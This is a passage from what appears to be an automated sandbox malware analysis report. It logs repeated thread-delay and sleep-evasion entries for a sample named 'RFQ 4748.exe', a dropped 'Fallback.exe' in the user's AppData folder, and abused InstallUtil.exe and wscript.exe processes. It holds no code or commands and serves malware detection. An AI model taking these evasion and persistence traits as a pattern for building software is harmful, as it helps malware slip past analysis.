                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597797
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597687
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597578
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597468
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597359
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597249
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597135
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 597017
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596866
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596765
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596656
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596547
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596437
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596328
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596218
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596109
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 596000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595890
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595781
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595670
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595562
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595453
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595343
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595234
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595125
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595015
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594906
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594797
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594679
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594578
                  Source: C:\Users\user\AppData\Roaming\Fallback.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599875Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599766Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599656Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599546Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599438Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599313Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599188Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599063Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598953Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598844Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598719Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598607Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598500Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598391Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598281Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598172Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598062Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597949Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597715Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597599Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597469Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595208Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595049Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594922Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594811Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594703Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594594Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593985Jump to behavior
                  Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
                  Source: C:\Users\user\Desktop\RFQ 4748.exe Window / User API: threadDelayed 7883
                  Source: C:\Users\user\Desktop\RFQ 4748.exe Window / User API: threadDelayed 1922
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 2540
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 7315
                  Source: C:\Users\user\AppData\Roaming\Fallback.exe Window / User API: threadDelayed 2563
                  Source: C:\Users\user\AppData\Roaming\Fallback.exe Window / User API: threadDelayed 5950
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 2676
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 7146
                  Source: C:\Users\user\Desktop\RFQ 4748.exe TID: 6976 Thread sleep count: 7883 > 30
                  Source: C:\Users\user\Desktop\RFQ 4748.exe TID: 6976 Thread sleep count: 1922 > 30
                  Source: C:\Users\user\Desktop\RFQ 4748.exe TID: 6764 Thread sleep count: 32 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5436 Thread sleep count: 35 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6536 Thread sleep count: 2540 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6536 Thread sleep count: 7315 > 30
                  Source: C:\Users\user\AppData\Roaming\Fallback.exe TID: 5588 Thread sleep count: 2563 > 30
                  Source: C:\Users\user\AppData\Roaming\Fallback.exe TID: 5588 Thread sleep count: 5950 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720 Thread sleep count: 39 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1352 Thread sleep count: 2676 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1352 Thread sleep count: 7146 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -597469s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -597360s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -597235s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -597110s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -596985s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -596860s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -596735s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -596610s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -596485s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -596360s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -596235s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -596110s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -595985s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -595860s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -595735s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -595610s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -595485s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -595360s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -595208s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -595049s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -594922s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -594811s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -594703s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -594594s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -594485s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -594360s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -594235s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -594110s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5720Thread sleep time: -593985s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 100000Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 99874Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 99766Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 99656Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 99547Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 99437Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 99328Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 99219Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 99098Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 98969Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 98859Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 98627Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 98500Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 98382Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 98264Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 98156Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 98029Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 97922Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 97813Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 97688Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 97563Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 97438Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 97328Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 97219Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 97094Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 96984Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 96875Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 96766Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 96656Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 96547Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 96437Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 96328Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 96219Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 96094Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 95984Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 95875Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 95766Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 95656Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 95547Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 95437Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 95306Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 95187Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 95078Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 94969Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 94844Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeThread delayed: delay time: 94734Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599874Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599765Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599656Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599546Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599437Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599328Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599218Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599109Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598890Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598781Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598672Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598562Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598451Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598343Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598125Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598015Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597906Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597797Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597687Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597578Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597468Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597359Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597249Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597135Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597017Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596866Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596765Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596656Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596547Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596437Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596328Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596218Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596109Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595890Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595781Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595670Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595562Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595453Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595343Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595125Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595015Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594906Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594797Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594679Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594578Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 100000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 99891Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 99780Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 99672Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 99563Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 99433Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 99328Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 99132Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 98884Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 98688Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 98563Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 98438Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 98313Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 98203Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 98093Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 97985Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 97875Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 97766Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 97641Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 97531Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 97422Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 97313Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 97194Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 97078Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeThread delayed: delay time: 96969Jump to behavior
